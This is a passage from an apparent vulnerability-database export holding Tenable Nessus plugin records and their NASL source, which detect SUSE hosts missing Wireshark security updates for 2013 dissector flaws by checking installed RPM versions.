security_warning(port);\n exit(0);\n}\nif (info2) exit(0, \"The following installed instance(s) of Wireshark are not affected : \" + info2 + \".\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-20T14:43:08", "description": "This wireshark version update to 1.6.16 includes several security and\ngeneral bug fixes.\n\nhttp://www.wireshark.org/docs/relnotes/wireshark-1.6.16.html\n\n - The CAPWAP dissector could crash. Discovered by Laurent\n Butti. (CVE-2013-4074)\n\n - The HTTP dissector could overrun the stack. Discovered\n by David Keeler. (CVE-2013-4081)\n\n - The DCP ETSI dissector could crash. (CVE-2013-4083)\n\nhttp://www.wireshark.org/docs/relnotes/wireshark-1.6.15.html\n\n - The ASN.1 BER dissector could crash. ( CVE-2013-3556\n CVE-2013-3557 )\n\nThe releases also fix various non-security issues.\n\nAdditionally, a crash in processing SCTP filters has been fixed.\n(bug#816887)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 17, "published": "2015-05-20T00:00:00", "title": "SUSE SLED10 / SLES10 Security Update : wireshark (SUSE-SU-2013:1276-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-3561", "CVE-2013-4079", "CVE-2013-4076", "CVE-2013-3562", "CVE-2013-4078", "CVE-2013-3559", "CVE-2013-3558", "CVE-2013-3556", "CVE-2013-3555", "CVE-2013-4075", "CVE-2013-3560", "CVE-2013-4083", "CVE-2013-2487", "CVE-2013-2486", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-3557", "CVE-2013-4080", "CVE-2013-4074", "CVE-2013-4077"], "modified": "2015-05-20T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:wireshark-devel", "cpe:/o:novell:suse_linux:10", "p-cpe:/a:novell:suse_linux:wireshark"], "id": "SUSE_SU-2013-1276-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83596", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2013:1276-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83596);\n script_version(\"2.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-2486\", \"CVE-2013-2487\", \"CVE-2013-3555\", \"CVE-2013-3556\", \"CVE-2013-3557\", \"CVE-2013-3558\", \"CVE-2013-3559\", \"CVE-2013-3560\", \"CVE-2013-3561\", \"CVE-2013-3562\", \"CVE-2013-4074\", \"CVE-2013-4075\", \"CVE-2013-4076\", \"CVE-2013-4077\", \"CVE-2013-4078\", \"CVE-2013-4079\", \"CVE-2013-4080\", \"CVE-2013-4081\", \"CVE-2013-4082\", \"CVE-2013-4083\");\n script_bugtraq_id(58363, 58364, 59992, 59994, 59995, 59996, 59997, 59998, 59999, 60000, 60001, 60002, 60003, 60021, 60448, 60495, 60498, 60499, 60500, 60501, 60502, 60503, 60504, 60505, 60506);\n\n script_name(english:\"SUSE SLED10 / SLES10 Security Update : wireshark (SUSE-SU-2013:1276-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This wireshark version update to 1.6.16 includes several security and\ngeneral bug fixes.\n\nhttp://www.wireshark.org/docs/relnotes/wireshark-1.6.16.html\n\n - The CAPWAP dissector could crash. Discovered by Laurent\n Butti. (CVE-2013-4074)\n\n - The HTTP dissector could overrun the stack. Discovered\n by David Keeler. (CVE-2013-4081)\n\n - The DCP ETSI dissector could crash. (CVE-2013-4083)\n\nhttp://www.wireshark.org/docs/relnotes/wireshark-1.6.15.html\n\n - The ASN.1 BER dissector could crash. ( CVE-2013-3556\n CVE-2013-3557 )\n\nThe releases also fix various non-security issues.\n\nAdditionally, a crash in processing SCTP filters has been fixed.\n(bug#816887)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://download.suse.com/patch/finder/?keywords=cb4504a53f9b3d0625f514d688e2c947\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?023b8157\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2486.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2487.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3555.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3556.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3557.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3558.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3559.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3560.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3561.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3562.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4074.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4075.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4076.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4077.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4078.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4079.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4080.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4081.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4082.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4083.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.wireshark.org/docs/relnotes/wireshark-1.6.15.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.wireshark.org/docs/relnotes/wireshark-1.6.16.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/816887\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/820973\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/824900\"\n );\n # https://www.suse.com/support/update/announcement/2013/suse-su-20131276-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4e71c4a9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark packages\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLED10|SLES10)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED10 / SLES10\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED10\" && (! ereg(pattern:\"^4$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED10 SP4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLES10\" && (! ereg(pattern:\"^4$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES10 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:\"4\", cpu:\"x86_64\", reference:\"wireshark-1.6.16-0.5.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:\"4\", cpu:\"i586\", reference:\"wireshark-1.6.16-0.5.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"wireshark-1.6.16-0.5.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"wireshark-devel-1.6.16-0.5.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-20T15:18:09", "description": "This wireshark version update to 1.6.16 includes several security and\ngeneral bug fixes.\n\nhttp://www.wireshark.org/docs/relnotes/wireshark-1.6.16.html\n\n - The CAPWAP dissector could crash. Discovered by Laurent\n Butti. (CVE-2013-4074)\n\n - The HTTP dissector could overrun the stack. Discovered\n by David Keeler. (CVE-2013-4081)\n\n - The DCP ETSI dissector could crash. (CVE-2013-4083)\n http://www.wireshark.org/docs/relnotes/wireshark-1.6.15.\n html\n\n - The ASN.1 BER dissector could crash. ( CVE-2013-3556 /\n CVE-2013-3557 ) The releases also fix various\n non-security issues.\n\nAdditionally, a crash in processing SCTP filters has been fixed.\n(bug#816887)", "edition": 17, "published": "2013-07-31T00:00:00", "title": "SuSE 10 Security Update : wireshark (ZYPP Patch Number 8659)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-3561", "CVE-2013-4079", "CVE-2013-4076", "CVE-2013-3562", "CVE-2013-4078", "CVE-2013-3559", "CVE-2013-3558", "CVE-2013-3556", "CVE-2013-3555", "CVE-2013-4075", "CVE-2013-3560", "CVE-2013-4083", "CVE-2013-2487", "CVE-2013-2486", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-3557", "CVE-2013-4080", "CVE-2013-4074", "CVE-2013-4077"], "modified": "2013-07-31T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_WIRESHARK-8659.NASL", "href": "https://www.tenable.com/plugins/nessus/69169", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69169);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-2486\", \"CVE-2013-2487\", \"CVE-2013-3555\", \"CVE-2013-3556\", \"CVE-2013-3557\", \"CVE-2013-3558\", \"CVE-2013-3559\", \"CVE-2013-3560\", \"CVE-2013-3561\", \"CVE-2013-3562\", \"CVE-2013-4074\", \"CVE-2013-4075\", \"CVE-2013-4076\", \"CVE-2013-4077\", \"CVE-2013-4078\", \"CVE-2013-4079\", \"CVE-2013-4080\", \"CVE-2013-4081\", \"CVE-2013-4082\", \"CVE-2013-4083\");\n\n script_name(english:\"SuSE 10 Security Update : wireshark (ZYPP Patch Number 8659)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This wireshark version update to 1.6.16 includes several security and\ngeneral bug fixes.\n\nhttp://www.wireshark.org/docs/relnotes/wireshark-1.6.16.html\n\n - The CAPWAP dissector could crash. Discovered by Laurent\n Butti. (CVE-2013-4074)\n\n - The HTTP dissector could overrun the stack. Discovered\n by David Keeler. (CVE-2013-4081)\n\n - The DCP ETSI dissector could crash. (CVE-2013-4083)\n http://www.wireshark.org/docs/relnotes/wireshark-1.6.15.\n html\n\n - The ASN.1 BER dissector could crash. ( CVE-2013-3556 /\n CVE-2013-3557 ) The releases also fix various\n non-security issues.\n\nAdditionally, a crash in processing SCTP filters has been fixed.\n(bug#816887)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2486.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2487.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3555.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3556.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3557.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3558.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3559.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3560.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3561.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3562.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4074.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4075.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4076.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4077.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4078.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4079.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4080.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4081.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4082.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4083.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8659.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"wireshark-1.6.16-0.5.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"wireshark-1.6.16-0.5.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"wireshark-devel-1.6.16-0.5.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-20T14:41:59", "description": "This wireshark version update to 1.8.8 includes several security and\ngeneral bug fixes.\n\nVersion update to 1.8.8 [bnc#824900] :\n\n - vulnerabilities fixed :\n\n - The CAPWAP dissector could crash. wnpa-sec-2013-32.\n (CVE-2013-4074)\n\n - The GMR-1 BCCH dissector could crash. wnpa-sec-2013-33.\n (CVE-2013-4075)\n\n - The PPP dissector could crash. wnpa-sec-2013-34.\n (CVE-2013-4076)\n\n - The NBAP dissector could crash. wnpa-sec-2013-35.\n (CVE-2013-4077)\n\n - The RDP dissector could crash. wnpa-sec-2013-36.\n (CVE-2013-4078)\n\n - The GSM CBCH dissector could crash. wnpa-sec-2013-37.\n (CVE-2013-4079)\n\n - The Assa Abloy R3 dissector could consume excessive\n memory and CPU. wnpa-sec-2013-38. (CVE-2013-4080)\n\n - The HTTP dissector could overrun the stack.\n wnpa-sec-2013-39. (CVE-2013-4081)\n\n - The Ixia IxVeriWave file parser could overflow the heap.\n wnpa-sec-2013-40. (CVE-2013-4082)\n\n - The DCP ETSI dissector could crash. wnpa-sec-2013-41.\n (CVE-2013-4083)\n\n - Further bug fixes and updated protocol support as listed\n in:\n https://www.wireshark.org/docs/relnotes/wireshark-1.8.8.\n html Version update to 1.8.7 [bnc#813217, bnc#820973] :\n\n - vulnerabilities fixed :\n\n - The RELOAD dissector could go into an infinite loop.\n wnpa-sec-2013-23. (CVE-2013-2486 / CVE-2013-2487)\n\n - The GTPv2 dissector could crash. wnpa-sec-2013-24\n\n - The ASN.1 BER dissector could crash. wnpa-sec-2013-25\n\n - The PPP CCP dissector could crash. wnpa-sec-2013-26\n\n - The DCP ETSI dissector could crash. wnpa-sec-2013-27\n\n - The MPEG DSM-CC dissector could crash. wnpa-sec-2013-28\n\n - The Websocket dissector could crash. wnpa-sec-2013-29\n\n - The MySQL dissector could go into an infinite loop.\n wnpa-sec-2013-30\n\n - The ETCH dissector could go into a large loop.\n wnpa-sec-2013-31\n\n - Further bug fixes and updated protocol support as listed\n in:\n https://www.wireshark.org/docs/relnotes/wireshark-1.8.7.\n html Ohter bug fixes :\n\n - 'Save As' Nokia libpcap corrupting the file.\n (bnc#816517)\n\n - wireshark crashed in 'SCTP' -> 'Prepare Filter for this\n Association'. (bnc#816887)", "edition": 18, "published": "2013-07-28T00:00:00", "title": "SuSE 11.2 / 11.3 Security Update : wireshark (SAT Patch Numbers 8044 / 8045)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-3561", "CVE-2013-4079", "CVE-2013-4076", "CVE-2013-3562", "CVE-2013-4078", "CVE-2013-3559", "CVE-2013-3558", "CVE-2013-3556", "CVE-2013-3555", "CVE-2013-4075", "CVE-2013-3560", "CVE-2013-4083", "CVE-2013-2487", "CVE-2013-2486", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-3557", "CVE-2013-4080", "CVE-2013-4074", "CVE-2013-4077"], "modified": "2013-07-28T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:wireshark"], "id": "SUSE_11_WIRESHARK-130711.NASL", "href": "https://www.tenable.com/plugins/nessus/69091", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69091);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-2486\", \"CVE-2013-2487\", \"CVE-2013-3555\", \"CVE-2013-3556\", \"CVE-2013-3557\", \"CVE-2013-3558\", \"CVE-2013-3559\", \"CVE-2013-3560\", \"CVE-2013-3561\", \"CVE-2013-3562\", \"CVE-2013-4074\", \"CVE-2013-4075\", \"CVE-2013-4076\", \"CVE-2013-4077\", \"CVE-2013-4078\", \"CVE-2013-4079\", \"CVE-2013-4080\", \"CVE-2013-4081\", \"CVE-2013-4082\", \"CVE-2013-4083\");\n\n script_name(english:\"SuSE 11.2 / 11.3 Security Update : wireshark (SAT Patch Numbers 8044 / 8045)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This wireshark version update to 1.8.8 includes several security and\ngeneral bug fixes.\n\nVersion update to 1.8.8 [bnc#824900] :\n\n - vulnerabilities fixed :\n\n - The CAPWAP dissector could crash. wnpa-sec-2013-32.\n (CVE-2013-4074)\n\n - The GMR-1 BCCH dissector could crash. wnpa-sec-2013-33.\n (CVE-2013-4075)\n\n - The PPP dissector could crash. wnpa-sec-2013-34.\n (CVE-2013-4076)\n\n - The NBAP dissector could crash. wnpa-sec-2013-35.\n (CVE-2013-4077)\n\n - The RDP dissector could crash. wnpa-sec-2013-36.\n (CVE-2013-4078)\n\n - The GSM CBCH dissector could crash. wnpa-sec-2013-37.\n (CVE-2013-4079)\n\n - The Assa Abloy R3 dissector could consume excessive\n memory and CPU. wnpa-sec-2013-38. (CVE-2013-4080)\n\n - The HTTP dissector could overrun the stack.\n wnpa-sec-2013-39. (CVE-2013-4081)\n\n - The Ixia IxVeriWave file parser could overflow the heap.\n wnpa-sec-2013-40. (CVE-2013-4082)\n\n - The DCP ETSI dissector could crash. wnpa-sec-2013-41.\n (CVE-2013-4083)\n\n - Further bug fixes and updated protocol support as listed\n in:\n https://www.wireshark.org/docs/relnotes/wireshark-1.8.8.\n html Version update to 1.8.7 [bnc#813217, bnc#820973] :\n\n - vulnerabilities fixed :\n\n - The RELOAD dissector could go into an infinite loop.\n wnpa-sec-2013-23. (CVE-2013-2486 / CVE-2013-2487)\n\n - The GTPv2 dissector could crash. wnpa-sec-2013-24\n\n - The ASN.1 BER dissector could crash. wnpa-sec-2013-25\n\n - The PPP CCP dissector could crash. wnpa-sec-2013-26\n\n - The DCP ETSI dissector could crash. wnpa-sec-2013-27\n\n - The MPEG DSM-CC dissector could crash. wnpa-sec-2013-28\n\n - The Websocket dissector could crash. wnpa-sec-2013-29\n\n - The MySQL dissector could go into an infinite loop.\n wnpa-sec-2013-30\n\n - The ETCH dissector could go into a large loop.\n wnpa-sec-2013-31\n\n - Further bug fixes and updated protocol support as listed\n in:\n https://www.wireshark.org/docs/relnotes/wireshark-1.8.7.\n html Ohter bug fixes :\n\n - 'Save As' Nokia libpcap corrupting the file.\n (bnc#816517)\n\n - wireshark crashed in 'SCTP' -> 'Prepare Filter for this\n Association'. (bnc#816887)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=813217\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=816517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=816887\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=820973\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=824900\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2486.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2487.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3555.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3556.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3557.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3558.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3559.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3560.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3561.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3562.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4074.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4075.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4076.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4077.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4078.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4079.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4080.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4081.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4082.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4083.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 8044 / 8045 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n 